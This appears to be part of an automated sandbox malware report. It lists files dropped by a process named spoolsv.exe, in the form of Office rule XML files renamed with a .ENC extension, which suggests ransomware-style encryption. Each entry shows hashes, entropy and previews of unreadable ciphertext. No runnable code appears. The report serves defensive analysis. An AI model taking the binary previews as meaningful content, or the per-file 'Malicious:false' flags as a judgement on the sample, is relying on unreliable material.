                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.sS...-U..BZ..b....{4...e.6.[...R......4KQ9...M...3.b..t+vm6.C$6.@}...=.N.1...NI..A..5.K^...#9..({...X..cy@.{........<$....~?5+..xTJO.~...k.c#f..FH&TtQ|yY...*..f...1...?i..]..'Ie3.iV.w...(=x........D......D.......s/.}....W[.....x.<...C_#3..=}...Hh0....|?."...C ...[ke{..X.a..F....D.4.D...qa/.$......1..:.S7e.:0O.^I0.&.|r....av4.O.3....k.e\..-.S.e@..Z...3.6....4Q.t.H1....^.7-.........Z!.,.K...0'...P*....S...q....>..).......m.gg.......p.-.....>.....(7.-.tD.p.q?}..t...wD.......9{r...l......r.O...^:r....+...f..u.L...Q_..J...;..0t..-.G6.~..AZ.Rk+..cq.._$......../).$...t..=...D.r.............=w..M...?P...l1......{.B.o5...R9gs......<{..V....n.On.ctw);^.....k......vH"..G.@....&*.;..@..n}..#..>`.6.....!..L!.nA....I..r.).w...;1.T"..C.;.j..../.........c1..)fI...N~u6MH.\-N5.C....xzJ6...j.u....^.W9.R...qFJ..{v....V.xpZ..LQ..o#_Pl......+:}.....xP..{......V..0.<.y...?"..}....3oN.X..^....S.*5..M.....#d.d.?.c...H

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704101v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8689341288555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+3hS5FuKUDfL6Xp/mdeAbpx6ExsOm5qpWOBI18nQgvYVAf9iMUxLedaRYkCHcx0W:+307qfeXp/eD2Ex15QgvYNM4PHnHV
                                                                                                                                                                                                                                                      MD5:F5C50225695AE3B61D681BF3E1509128
                                                                                                                                                                                                                                                      SHA1:CFE90C7EE138FD76590C8C3ADA515B320C5F70BE
                                                                                                                                                                                                                                                      SHA-256:DA304413F84B0632346D23D701D0FAA7C8B8AE20E9A46E9B3DDC017113E8B716
                                                                                                                                                                                                                                                      SHA-512:4DB1961E137CFC0E74AC3912DA6821FCA1F7C75F0A5E7BB61E83A43694EA9DBDC8DF6E65B426BDE01D83276FF7B9DB90CF9784354C7A5E90E335977DE75578E6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....^g7x%.S...,Z.......C.........$..7... .]ERo...u...M;....P!&0@....7.t....K.L.B.3.$&b.?..@...FM..XH8...cD.u...;v>..n..J...*.Q..NZ..J..,V..Jh.z.p.N.[g..Y.......F.!=.U.UG.....?j.h.O...w...~L.w5...Mx..F.^..z......F....X...9.C...W..".........5...=..M-+Vd{h.zRL<_...T.W..w]Jm.D.Fr.k......#...<....|[.z~K.7...2.}.f.Yk..n.g..t..w.........lI..V...7Jv&...2.r...c.o.......2..........S..qQ.{..{...V{.....FM..{-.....&..&......{..v....^I...g]..t.'8...`$.J.0..r"..b..,.*..q]...8..v5@Z...5..5.....k+.........B....M}.V...:..R.H..-.k.N^.x.7$.....UN.K:.W.;........ik@y.... ...7|.u@.(...u]....I..?.f{6. .||..~.P.._.I..\.'...=.R..`..-..*..Bsj..R.M...I..m.%!..6..U..s6..(.ga+..4.%s.^..m.....n.GO..P3.......<.( uC4.A.;.....c.....T.hrE+.........i.. .n;.A)..V..^5..n..NL.*...Y-0.%.W....I.V"...].._4...`H.i1../.e6..`..\8.U.}{Ka.|..T....,.7.....i]wFY~..*..hj..@...eG.....,.._.I.Y.....y!..)..Q.K..h...3E..{9.b.'.d7M......O.lq.#6.I.....<@

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704150v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.867521295563125
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+FnrY2bHaobgEqM19uU9iOAEe+lZFasqxET97vyk5bd2ePGBKhRa8Qwm0t:+Z82zao0EqoH9iOAEewFa9Gvykx+BKhv
                                                                                                                                                                                                                                                      MD5:3A7AF1FFA029826E1CE7675644EB713B
                                                                                                                                                                                                                                                      SHA1:50677C42C9AB5D80D435A6CF7C851F6F8A33BB47
                                                                                                                                                                                                                                                      SHA-256:4805A09E638F4CE7C73CFA516E6BD821BD7659CA275BEC55F87862A3803DEE87
                                                                                                                                                                                                                                                      SHA-512:9A8E6873FC96B43F3D8AD4E88B58A5E7D760CCF41AA65644FC983403E89CFEEDC1B4D6BE70E7383B0917439619A4486F01037FB8A07711ACE28D78AE09D314BB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..Q.....~...W(...pv.).,C.=ir4..U$......k ...[j..K..Pa..-.....`.[Mi.([.KY.%...Bu.e....cn..i.2g-E..l.>-...:....2.-g\...{g...}=d.}.W..|<..@..:..7.....@...:........I/|6../...:.....X$....)nZ. ..p...........rxS\..a....nX~\I...r../.a..vj^t..>X2......<..Q!..qG.x..........O.I....:..)N.3....#R...3.1....'..^..?<.......H..q.RU..;}...C.J_......2\.?..J.~yD.v..b.}j.....2..?.r...SO.;...UH.nj..r.K<........k.Wti....k...S)......~..h..K.%...k....El.f.?c....84@.....o.j.....Fu...o...z.....k...&....s...;.....~[.9.Py...\.b.....6.6.m...T.+...`..-.O..Grm../.N.......l.2Z..`b.'..l..]l..gN5&.A.)O" f..o..Cb..#........".X..e=(.E.'....fr..yQ...5.5.P.m....*......t..(t.....P.........k...W../.....S.N..>...IfM....Q...J.`..3........`G`+F.(..;.Jv-......d..q.b.Q.....|....^.`.4....#N.<y.l.2)g..Wr-kR...>l.h.W].j..`3..U..\..v..f.r...Tg...3...wp{.......+F.I.07...,.s...a..!+..0..}j..M....Lw..<....4.....8.5:U.@..K.....q4..<l..N....kD.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704151v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.86666595824943
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+EHyFq8LfY7Z1+Ir26FAS1yb+tDWwFLuwk0/48GmeD5rAXxCDj2FxbHHhq/zFfSh:+EHgq8Luou26yUtDWwcwk0/nSrRGXbH7
                                                                                                                                                                                                                                                      MD5:3ED4864849556FD1C5CF54D5A1ECF166
                                                                                                                                                                                                                                                      SHA1:B7975B6AE2A85008132343786C71B23B5DE48E86
                                                                                                                                                                                                                                                      SHA-256:F6F4EB170A602F97803691785C062C7AE3EC0AFA3465AB71127EFF93BF741ABF
                                                                                                                                                                                                                                                      SHA-512:F650B06A317959B2BB1B3744EA31DFB9D6EACAFDC39125C6EF0C20723C35C787F5B1EF48EAE2B06FC5BF0417DE59664BE867204DF94DD01D4C694555E4170A3D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..A..6...p2.1..Tl.*..~...f..&.|..i...........1+.q\?...t8...Z.w..)..y..r.,..|7X...T.r|e4s.L......Y.J.h.x...=I.ah..G.s&...\..4..[.~d..{.4...mK.......$f.<.M.,...q)..."s..UN.{/..+.%{......3.}.....9."...].x.j{x.8.m.S?_e....@b.SJ.../.C~.........+..M$M......I.uxJ.Q$tk..fB....p..cR.^....s......6....5.....Bt..y.K...|.?\.o......._(..d9..S...wVY....EN.. ...+m.&.5..W.[..~r8tD...I1...,..s....If|Q.,]$...-.&@..:...B.Y...t...A....lLW..)....]L....S.C.v;N...m#..N...KhB.D?,.=...l<....b.....l*.m9o......k.Z..6.E...."xD....H...7....F.e.O....\5r%..~..R6....W....F.,.B3R....T..fAmn.R. S.i.2s....i.......%;.n[.|.M..I.p.]RXhx...0jMW.>o>.p.H........./....w.Z...7....K{..]..Jl......d.?Y*.kT.-.j.T.A..)G..3.Gd.zg.......X.h..\g..mz.``...k..+\c.@Euk'AV..l...\.9>.0K'.......,R.xf.,...j.L.L.....1.Z,..#qpWB.d....6...p.9....)...B...6p...Fv...pI.o.z..$h....gg....#.DV.0x..vS2bz...nX.~.n.0gv..`.#0%........3Nk....?...DU2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704200v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.828105240416224
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+H8DzUYpRNGvKmTyrdmbIjmKuJspA6mucsbYGU/gmfY2rVwK+yul8BA5b:+H8Dz1wBzbIY8A4pcGcffY2mnL8Bib
                                                                                                                                                                                                                                                      MD5:0C1DE000BC63E6FCB8571EB9928E5BD1
                                                                                                                                                                                                                                                      SHA1:68215D274772E53CD5F9E094EC9ACC18A29BEF85
                                                                                                                                                                                                                                                      SHA-256:1E0DBC36E66DC070D87F024A72593C3E43E197222CAE7E52DB6318ECB0F26A1C
                                                                                                                                                                                                                                                      SHA-512:BE26F99FB6E0AF6C218C8B2D79DC724F7A20C8CEC710FFD0F0493B3F63B83DA29638BF12A2C9ACD975D9948F7E32C4421E03E19ADEA95A535E35AC618B57CB20
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.\..1..@..jrc>.N.T..2..0O....^.]!;V(..)....MvP.cM.|C...]...)..|..`..q..*..6.&g.?...1Pe........v.9....t..f6n...{6.Y.c.......6....[S.&v6..jCGN.\'.T.'...xj....J..X%c.....`.NA...gm.%..HR.........h..=.k....F.4K.+...]hT....\.bN.....(.Yo6..k....2..Y..J;...7%WP.J....H.B...&.$..3.C..8.u.s>..\....T.j?C.......K.a..E]......yu.....&.g.3X.@..4fz.....h.[>?..........o....ei..'.gR,C.kN......JW`..A..8... j.#../.....W]..k.nD.5....7.V.8Zf.Z..o.3..r...5.*....xf....h..D.......'.A.|..1.LX.9.fIs?iY.....2F_?.X.7ZJ..=..lr....D...F.Y....d....\p|K,...G.k9...U...`......,]cR.$....2.7h..j.q.S.A)F..89&.w.....K.(F..TA..c....B.^.6NSN.hP....0.h..r....1'..<.hc.W....AV.{o.JPXS~....{.......oZ.._V.#.;...6MM.NB..}...@].....b]T...;...W.u.."... (!.{.fS[.9B).F......{]....C'.H%}.....l;..i.F....5.d..}..!.t..4.>...i....-Q.:....k.tiV...N.q..(.!>.R...M....q.L.s....~....f.^..T...k.It....N.O|...3\.k/....:.G..%6z.NY.E_..8...l.RN.....E..K..2.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704201v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.872001453493479
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+kF5rq0EaHwY0OYwvN10razMf3AOQurwbaqwRMUzSqHoByh1+wLygo8jfodBT:+0Oy0qV6Xw96wGPiBchGgoo2
                                                                                                                                                                                                                                                      MD5:F8EBACA122EF7D822105C46EA6B5CC26
                                                                                                                                                                                                                                                      SHA1:12A7D4976AE624A4E1ED2D06BB4C5DA708EFCF31
                                                                                                                                                                                                                                                      SHA-256:46547BD2B10DE984191767A5D5C476E35775780F56C7355A26D0F58E38D41AB0
                                                                                                                                                                                                                                                      SHA-512:63BAE4338AC9F17A30E200FC6EEBD9D0CC9AF18BD8E65DDED67303930EBD94DC49CEF998C0C86B769471D85A9D6C77241555F28291EA74D703CF1994D7FFA033
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...l.Y.*.-$$D.CS.2...l..7.f.v.v.L1.;..K.M..P.R,...]....hm.]...4.,....`...g$6....<t.uM".&.....z.=K..$...|Ruy!.i...|.....@?jV.....2h4.A..b;..~rC..=...22V........C.#(`..0.V......U..5...../.h&..<E..-.l~..v.p:...p}A\...U........K.`..j..K.^......@..C...eZ....'ga....yu*.D..J..,...r...K{.7...C.e......6....r%.C.c.T6.9?..,..6...z#..=-x.$..9.Rd....YR.N...._h..D.&.yCa.g..g...0.......Q{..n....tz.f.KC.......3.aD....=.m....c~.w...5h..&.|.A?.".%L..;|.X.$....V.Q..*...dM.....&.%.{....[..r1 ......n.6..90"..%.Y..F.2R..U.Ex.al.;E.]$^}...%.Zl.....E7.5E.%PwFvz....N..fQ....*T.....k...a9.b..B.?B...2..<..8!.u6t...@..ao.%...P._r...<\{.02.k...R~...I.G.p.F....H...l..5k.A....6"....(..B.\..YXX...X.6.I...)o.....t....8...\;2...m..._IB..c.cG\...0..-Z...P.d.J....M..0.{.=8..*.@..L.M.W&.I.$!..FY...l..u...!........!0Q.V<t....\@..A_....'.<..0..JD....Q..h...4....SfM=V..Us..9..w.V..H....h..Q}...3...;B..^C)....w....\.[.R.A. .*"

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule90401v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1264
                                                                                                                                                                                                                                                      Entropy (8bit):7.833579403109686
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+e7Q6QwQwnznTUaa9RNXJXnrT7dToTLMLPv2m1j4BhphNrjsN9bpb35K:+e7QnufUaa7RFx8Mrv51j4Bhib38
                                                                                                                                                                                                                                                      MD5:A5E375BE0E550CE96C23418FAE54229C
                                                                                                                                                                                                                                                      SHA1:73AB2AD61AF76A89443D110905CCBF7CF61DBCD9
                                                                                                                                                                                                                                                      SHA-256:B0376CAFECDDC2AE3202DD9AC0F3200C6C936A478A99472ED209B1AF739AC966
                                                                                                                                                                                                                                                      SHA-512:8814227FB9DB2D935B72C52A1BCECA63B8D9DE52D0AEC67F315195BDD6A527729BD66382984CBE3FB3A886240A05C80E8AD12885E4D30E96374823CFC3B89293
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..UWi.T.......c.............f1.{_.....8XRk....BEU.W.g..r...fNY.lf....7..V.H@....So..t.}.qg..2.. 7Q=..t..y+..:..S\h.^U=Q.....t...r.(.j..t8Sj.^..G.:....G...G..m..\..c|R....... 7b.O..x.`JX:.`..8.&$..IR.._i../;w..#w...s..I.Z..B.Tp....F..|m.U.1.....B...%..q{...o...B....+&.5C....\>....!...3.....@2...L.A...>..O.^../5E..q.7..g.UBR....."*..I...o.+4..1..,.... .F.e...r.}....O.f...M......+.S;.R-.O|^.5./.9..:..)....J.....E.U/Q[...U.I.%3.........g.niQ.f....x...N.t.....z,m.1..bn...s2..#..;.D..=X....F..wi<2[..:....._;c .O.N.u....`..^&.6y...5.\;..0/f..H.d..2Ti.h..O...h:..J>.SC..7*M".U.z.3........j.*..k..Wu..{...g.^..^h...._..W`.o.8.+.9......0..\R....B.o(s..^.../...l&...y...1..qm..j.z..D.W.j..D.uAL.*.W.E:y.6.x".....,5.n-.....D..5t..4..tH8..Z.(3...$(...s2@.x..B..y .X._..b...B.y..q.....U..Y...W.L....3.g...vW......C./-...FX{.p.D..rJ..R.....w..^1.X%wJ.......~.|.`..=...0wQP............P..-y.n...$Y-...j. ....8......$~.x....9...|6m-..^

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule1000v5.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1600
                                                                                                                                                                                                                                                      Entropy (8bit):7.871717797465237
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++uasSmQWIwmOvW/7cXNBpjss8U7GsSdP5pfM:++uaOQW/3Xspv/pE
                                                                                                                                                                                                                                                      MD5:B00F3039359C50E7ED30EA63FE52884B
                                                                                                                                                                                                                                                      SHA1:14C5D0CD6A6DA4E3F8367F915C51F9ACCC0710A5
                                                                                                                                                                                                                                                      SHA-256:D77804F611CE7CB13B493BDB7EDD0D6B9A36CFCCD53EAD3F6FC5A6A6F23BEF90
                                                                                                                                                                                                                                                      SHA-512:1BFB9C78E5D2872DE0BEFD3CEF5A0CDE3036307BB214556EF45750C7CB66812DCD40BBC4BC2F3974B7FF9BDBBC472248B909715B753939B1A2D97E8650BC1FBD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f>.......#../..Q............I......H......Ms..Jy..3.).......5...<!8....M..0!,.y5..Q.|..'0..:t...nh-..^../.......`..._Q#.(.9.......j!G*...pnm.F..........jY...".1#2.n{z.`|A=...|g.Bc..~..=......0L..y....7.?......`.Ep..rKw..4....L.#o......a..B....z...$v0.H.....$.Wlh...8.+v.d6....KtfE..^).B..J.cD.3M.D.:YGd^....-.Zr.<$.&..*..p..#........N..Y....f.'0...^A.#.....Y.BZ.....b..ugxm...am..<.pcz&....?j... .d.N..7...r..h...(....O...'...,1=Sp....#.muti.........bc.K.#.......R.Z.?..!W........R.L5!...od....,...q,....R...S..bQ..s..P......"...L..l...I.;.......W.....V!.......m_.S..;....T.3.cZo<..n.$$X....vr.Z.......T....t..w.3..}...?...pf.nm...$d.D.mC.y.f.]m.&I..w...Ax..n..z.uc...&..9y.l..DL.i.a... .o.$...).i._u.?..3...(.J...D.]..T..7./..J...l.K....'.>.9...)&4..fe-..E..u.m.......@...gw@..."0..U7Cn..~.e.....TA..T.._...*..-q\N...aT...=].K.??....>j||..J..D.VR....h.,....a..gy...H...V.}@=.:o...F.c....F......|C.@.dL....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10450v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1056
                                                                                                                                                                                                                                                      Entropy (8bit):7.801313137757867
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++eYeRx9AE2z8eFbl8VS/2HmL/R8D52dIETG:++4RzArmQ/vl8DweaG
                                                                                                                                                                                                                                                      MD5:B932F9A96EA6FE9B26D353DEA55A460A
                                                                                                                                                                                                                                                      SHA1:69CE0006750D9B53E65AEA26C8B231E265FC991D
                                                                                                                                                                                                                                                      SHA-256:02059C3CFB6C2E6FBE99EC461C0B3CB035F3C75A0FE2E61297447C32D0AF2A22
                                                                                                                                                                                                                                                      SHA-512:24E8572A54A2978C42EBA6DCCF5B0123B5724454A52DD6A18517F6F544252D75718DA11F1E8C374BC46AB49DF610FB73B3B84E9568FE10BE486715A650083666
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fG..@c?.#=[....`..'..\n.p....$?.........Tj?.8.|...3z.oOQ..;..bDi}....y..Pe.X.k...;..4.xTO..1G..m.d.*/.X.8.s.o.W..I.v..WG.@3...n..%....:.8*.$n.O..x.1W.......^...Q.....u.....d.F..1.$%Me.xc...z.oYR...0...!.OB)..1....$i.....,.#}..`.K.........A.a.pvD.4....W....&>=P=..<0.D%x.#.q....c.V.W'i.....R.k+.N..N....O@.t..CbC.5l.`...ZSD.^.........yl.W.J..mF"...@...S...@.N.,..{`.#.....B.%.1J....R.XE{......z.&8......).oB.\6B7.....Nr.w.zq..a`.aE..mj.q..e.......0.&.....I.X..a.K*e2<:-.\.2.-M3%1;9v...@..X.(e)......%A. .".K..)k.D3.....e8;d....i.cv.~.S.K..TS.h97.@9(h.X..]#.C..&.t5.,5,......%..X.).V.!H...qW.V!.4....d..9wX......f....nrG...!O.<...s...X..<v(..=.H..\t[.PQ.!....?..Mo....C.....r.i.f.>."'.]...t......A.8..U...7.N.....%..i...y..iR.)7.9....0../A.X[..P..d.D.....i...pN..x..8=.-..,.@..TA/.!%0...,V..'2a.)..Z..X.u..,...g'.d'..AC..i.4%.85..'.E#...H.#....t8o.tX.^Q.{x^u.R.1$..E.G&.^.}...uH.r.......KU..).b..Q.B.f.} ..n...by...#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10625v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2704
                                                                                                                                                                                                                                                      Entropy (8bit):7.927943038771917
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++kzrrlBXZpBlsXiTp+NtfM6LYkjGy67Ug0HePSxxtq8lYu0MRIFyzn:++gBXZpBlEiI+kiy67KiSxTPlYXFyL
                                                                                                                                                                                                                                                      MD5:593EBCDCC95F8DF8D2DF01686A7B8E22
                                                                                                                                                                                                                                                      SHA1:2EEA1A60B43ED524F36CB07ADD74DEA9ED0DC7C8
                                                                                                                                                                                                                                                      SHA-256:6F7A42E94FA3272F933AD9803EBE0DA2481161013A9C4AED407FF69B6421E594
                                                                                                                                                                                                                                                      SHA-512:6EAE2350C25CA71C60C160A07AEE63943DC6B731C6DE3FC50A3222653CACA0958F27B0A6AB99F872465DD67D9A36C353FDA27C9623E0FA639F9823CDB2C1FF9F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..3=....~.].E.w?......X4n.'...;E..#..m..4t.)?.]j....y....z.=J....`.M..c^...^k.U.SN.=..=...|..Vi.4.....m..3.I.k..yR.&.T....R...P.e.....w.NhfFr.)..[.pc....l<..WQ.9...<p...v.Y.)......E...u.."...?%..L.J....+.I.D'_%..;.G.....k...\2.+..?. ... ...Q..FQ..j.Ct..<.........@.&..^Us....k...3...W..X:mB3.vK^9.H(....B.O..u.>..S..X.m..Yg...!.%X.3.l......U.%M.y5....@..........,..''(>....$|...ox.K........|......B*s..2.>/l...A.S......*.^..P.J%."...k..?hO*......o.T......?.....y.u..SN.J/...."...h..b.J..`.....b..p.}G...[1.....{.O..vU$.S.g...L..X.rK.`.r0.0.=.,S....i...o..........S..h....B..QU.}.....z....>....#.......K..X.|...O....T.+...n..7..V..`:j...F..............|.1..P..+f..a.p........[<7l.........\b..xqK.Oa.O!-I..]".u.*o...w.c...g.....q..g....l...7\..:...V.....|E%....r.n...!..x....8........C.....Q..d..E.... a.}.....Z..O.wT-+..R..e....0.2.|.i V.rU.E.....6}Ua/..........+v.IU.[..UN.H...FdGjA$2..;.,..[.BO..-+

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10626v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1344
                                                                                                                                                                                                                                                      Entropy (8bit):7.879899601743689
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++oSYBZFQqsbR7o/vkApV0QhKVpw7nq76zJyBusdyxpdEQtbvvHjfJsD4:++oSEirR000KIJzQusQVFaD4
                                                                                                                                                                                                                                                      MD5:C1651289E4EB1E2911FC3609D5271568
                                                                                                                                                                                                                                                      SHA1:A4B08EDF5713EA80E90E41C1FFD0D9F36C254F14
                                                                                                                                                                                                                                                      SHA-256:A508F1C8690BB60F2AA7723FC04CA3C9F951436BDAE859809040AB9787BD8B6E
                                                                                                                                                                                                                                                      SHA-512:0E6D1C1F8FA2A9BFB63BC9742077434CE076F7F5842861582FF40779DAA8612BBF9E5B49D1B43F408E2E57BCB5C55392DA083A9C106AA670284526CC5353D3D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f^|.....,..\sj.g.Xx.7..$.-........,. M.....PZ.A.....E...nZ.0.n{...2.[M..g[....z.io.)..v.I....G...>.K.............K......*...E.IL!.......6.@,..u.,.340...G.6..{.5.!#TMP.B.....>..(../.....I..IA$?..3. .....|......(.iZ......-.l<.eN......v..k6sbE)[.&.Xa..b....Y\..[..u....c......G.5Qz._].H..7..h.I.d..O&X.......G.:......j..<Tq...Jup.6Q...&........m....Y.9...J........v`.P..58...u;..s6:.?..'....+.....n...0y..V.S+...<"..XP..........-..7..&..m4.~..I....V..q}R{y<...R*}#.....A....:~..J=...a&..B.SJ.vh-B0...~o$0..{.4.S..lXZ...S....q.>.<(#..~.,J.Za;..r..#4S.Be2..2.6.O:\>".(.}..<.f.6A....U|...P.(.....o...(.B.......2.s.a....onN.I...S5#r.......<..WE&go.)B...&..yB[.nT.Y.....Ls.4 .5..RU...m-m$B...c."...]za...p..M...1.H7X]r.......r..\......gO...Li+u..z.s...`W..0Rl....r"@.*......e........^.{..Z-.S......I.no.^..*w.=.........J.a.(..J...;.I..Z..tVt....!..1.....&..c.].]").|...L.?C.."#%.?..ck\6'1.E$C.<mJS..K.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10627v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1792
                                                                                                                                                                                                                                                      Entropy (8bit):7.898190467491374
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++YSKvelsKYwiZm1Xepfw1nFef0nEoUfS:++YZ2kwem1Xep41FeCEFS
                                                                                                                                                                                                                                                      MD5:C782BEE137F27BE9B7CA29D3E3D2461E
                                                                                                                                                                                                                                                      SHA1:03DFC8399014766DB469F25A3CB27F905D1D7413
                                                                                                                                                                                                                                                      SHA-256:DBA8178198420B3C6DFBC529E8B36D99A6BD8FB38C7DEB1DBB50FF07E087D98E
                                                                                                                                                                                                                                                      SHA-512:087FC9EAE7A556EC92C70E0E56E05FB2AD2E53E3DD7BDBE011D8CD755CEE09CEA521E6A2080E42A2D371053F500A1A5EC51CDBB4FE9DB596D2B463EEB9978290
                                                                                                                                                                                                                                                      Malicious:false
